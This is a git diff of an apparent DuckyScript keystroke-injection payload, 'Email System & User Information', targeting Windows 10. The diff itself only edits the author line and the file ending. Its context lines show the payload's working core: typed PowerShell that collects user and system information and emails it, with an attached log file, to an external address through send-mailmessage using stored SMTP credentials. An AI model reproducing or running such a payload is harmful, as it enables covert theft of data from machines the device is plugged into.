diff --git a/OSINT/Email System & User Information.txt b/OSINT/Email System & User Information.txt index 1e823de..55996c8 100644 --- a/OSINT/Email System & User Information.txt +++ b/OSINT/Email System & User Information.txt @@ -1,5 +1,5 @@ REM Title: Email System & User Information -REM Author: @beigeworm +REM Author: @beigeworm | https://github.com/beigeworm REM Description: Uses Powershell to gather user and system information and send to an Email. REM Target: Windows 10 @@ -53,4 +53,4 @@ STRING ;$time = Get-Date;$ct = $time.addminutes($lost) STRING ;send-mailmessage -from $eml -to $eml -subject $subj -body $body -Attachment $syslog -smtpServer $smtp -port $prt -credential $cdtl -usessl STRING ;sleep 1;exit -ENTER \ No newline at end of file +ENTER